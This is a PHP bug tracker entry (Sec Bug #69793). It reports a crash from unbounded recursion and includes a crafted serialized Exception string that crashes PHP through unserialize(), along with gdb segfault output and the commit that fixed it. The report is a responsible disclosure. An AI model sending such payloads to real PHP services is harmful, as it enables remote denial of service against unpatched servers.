php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #69793 Remotely triggerable stack exhaustion via recursive method calls
Submitted: 2015-06-10 16:42 UTC Modified: 2015-08-04 22:20 UTC
From: andrea dot palazzo at truel dot it Assigned:
Status: Closed Package: Class/Object related
PHP Version: Irrelevant OS: Ubuntu x86_64
Private report: No CVE-ID:
 [2015-06-10 16:42 UTC] andrea dot palazzo at truel dot it
Description:
------------
Hello guys,
I marked this one as "security" because the crash is remotely triggerable (via unserialize()) so I thought you might not want it public, it doesn't seem to be exploitable though.

The problem is relies in how recursive method calls are handled, the number of nested calls a method could perform to itself doesn't seem to be limited, causing an infinite recursion that would result in invalid memory read access due to stack exhaustion.

The POC is trivial:

<?php

Class Dummy{

  public function recursion() {
    $this->recursion();
  }

}

$x = new Dummy;
$x->recursion();

?>

(gdb) r rec.php
Starting program: /usr/bin/php rec.php

Program received signal SIGSEGV, Segmentation fault.
zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h:592
592	in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h

Unfortunately, this is also triggerable remotely by crafting a special serialized object, also using only built-in classes like:

<?php

$e = unserialize('O:9:"Exception":7:{s:17:"'."\0".'Exception'."\0".'string";s:1:"a";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";R:1;s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";i:10;s:10:"'."\0".'*'."\0".'message";N;}');

var_dump($e."");

?>

(gdb) r exception.php 
Starting program: /usr/bin/php exception.php

Program received signal SIGSEGV, Segmentation fault.
zend_parse_va_args (num_args=num_args@entry=0, type_spec=0xb0776b "", 
    va=va@entry=0x7fffff7ff058, flags=flags@entry=0)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c:827
827	in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c



Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-08-04 22:22 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28fea
Log: Fix #69793 - limit what we accept when unserializing exception
 [2015-08-04 22:22 UTC] stas@php.net
-Status: Open +Status: Closed
 [2015-08-04 22:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28fea
Log: Fix #69793 - limit what we accept when unserializing exception
 [2015-08-04 22:30 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28fea
Log: Fix #69793 - limit what we accept when unserializing exception
 [2015-08-05 07:29 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28fea
Log: Fix #69793 - limit what we accept when unserializing exception
 [2015-08-05 10:12 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28fea
Log: Fix #69793 - limit what we accept when unserializing exception
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Mar 28 19:01:48 2017 UTC